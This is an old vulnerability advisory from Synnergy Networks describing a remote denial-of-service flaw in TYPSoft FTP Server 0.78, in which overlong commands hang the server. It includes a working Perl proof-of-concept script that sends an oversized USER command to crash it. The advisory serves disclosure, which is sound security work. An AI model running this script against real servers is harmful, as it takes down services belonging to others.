[ SOURCE: http://www.secureroot.com/security/advisories/9688270464.html ] ******************************************* + TYPSoft FTP Server remote DoS Problem + ******************************************* # Advisory by dethy # # www.synnergy.net # |=========================================| Advisory # 12 Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ] Systems : Win9X, WinNT Product : http://www.multimania.com/typsoft/ Discovery : dethy@synnergy.net " Another trivial bug. " Description ----------- TYPSoft FTP is a Freeware FTP server, with all the necessary features to facilitate beginners and advanced users. Vulnerability ------------- TYPSoft FTP Server does not correctly deal with long commands over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass', 'cwd', etc, causing the server to hang and increase system resources. The process will not be active until it is manually restarted. !! NEW !! After releasing this advisory Noam Rathaus from http://www.BeyondSecurity.com mailed me, and said: .. "this product is also vulnerable if you connect to the server, but not send anything (do the SYN/ACK sequence but disconnect immediately). This is due to the fact that they use a DELPHI TSocket class, which doesn't handle exceptions very well. " ------- simple script to send a long 'user' command to the server, resulting in the ftpd crashing. ================================== #!/usr/bin/perl use Getopt::Std; use IO::Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} $serv = $args{s}; $foo = "A"; $number = 2048; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "ftp(21)", ) || die("Unable to connect to ftp port at $args{s}\n"); $remote->autoflush(1); print $remote "USER $data". $EOL; while (<$remote>){ print } print("\nCrash was successful !\n"); sub usage {die("\n$0 -s \n\n");} ==================================== Solution -------- The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version comes out or use an alternative product. Disclaimer ---------- Synnergy Networks may not be held liable for the use and/or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk. --------------------------------------------------------------------------------------- Web : http://www.synnergy.net E-Mail : dethy@synnergy.net